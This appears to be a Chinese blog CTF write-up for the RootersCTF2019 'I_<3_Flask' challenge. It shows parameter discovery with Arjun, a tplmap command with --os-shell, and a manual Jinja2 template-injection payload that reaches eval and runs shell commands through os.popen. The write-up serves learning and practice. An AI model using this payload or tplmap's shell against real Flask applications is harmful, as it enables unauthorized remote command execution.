2021-08-23  /2021/08/23/RootersCTF2019-I_3_Flask/ 99+   2 分钟   0.2 k0次访问

RootersCTF2019-I_3_Flask

摘要

模板注入、arjun、tplmap

第一次感到工具注入的快感🤣

flask 应该就是模板注入了……有几个考点

参数爆破

对可用参数的爆破,可使用Arjun工具

image-20210823165026964

可以获取可用的name参数

模板注入

tplmap 工具

image-20210823165152868

可以获取到 name 参数、模板引擎、系统等信息,结合shell命令:

python2 tplmap.py -u http://89c50d73-c596-4cbd-b2e0-34207638b293.node4.buuoj.cn:81/?name=1 --engine=Jinja2 --os-shell

image-20210823165707724

用脚本感觉好爽……

手工注入:

1
2
3
4
5
6
7
8
9
10
11
{% for c in [].__class__.__base__.__subclasses__() %} 
  {% if c.__name__ == 'catch_warnings' %} 
    {% for b in c.__init__.__globals__.values() %} 
      {% if b.__class__ == {}.__class__ %}
        {% if 'eval' in b.keys() %} 
          {{ b['eval']('__import__("os").popen("ls").read()') }}    //这里的ls就是需要的执行命令
        {% endif %} 
      {% endif %} 
     {% endfor %} 
  {% endif %}
{% endfor %}

——https://www.cnblogs.com/yesec/p/14905799.html

参考文章:
BUUCTF [RootersCTF2019] I_<3_Flask

RootersCTF2019-I_3_Flask

http://example.com/2021/08/23/RootersCTF2019-I_3_Flask/

作者

inanb

发布于

2021-08-23

更新于

2021-08-23

许可协议

# 相关文章
  1.CISCN2019-总决赛-Day1-Web4-Laravel1
  2.网鼎杯-2020-青龙组-filejava
  3.实验--通过FTP_SSRF_攻击PHP-FPM
  4.实验--SSRF_PHP-FPM
  5.实验--PHP-FPM_未授权访问漏洞
  6.天翼杯-2021-esay_eval
  7.SUCTF-2018-MultiSQL
  8.GXYCTF2019-BabysqliV3.0
# 推荐文章
  1.Black-Watch-入群题-Web
  2.DDCTF-2019-homebrew event loop
  3.GYCTF2020-EasyThinking
  4.GXYCTF2019-BabysqliV3.0
  5.GYCTF2020-Easyphp
  6.HFCTF2020-JustEscape

喜欢这篇文章?打赏一下作者吧

关注我

:D 一言句子获取中...

链接

最新文章

分类

归档

标签

buuctf29
Buuctf5
PHP2
RCE2
php变量覆盖2
伪协议2
Buuctf PHP代码审计 文件包含1
Buuctf SQL1
Html和css1

订阅更新

×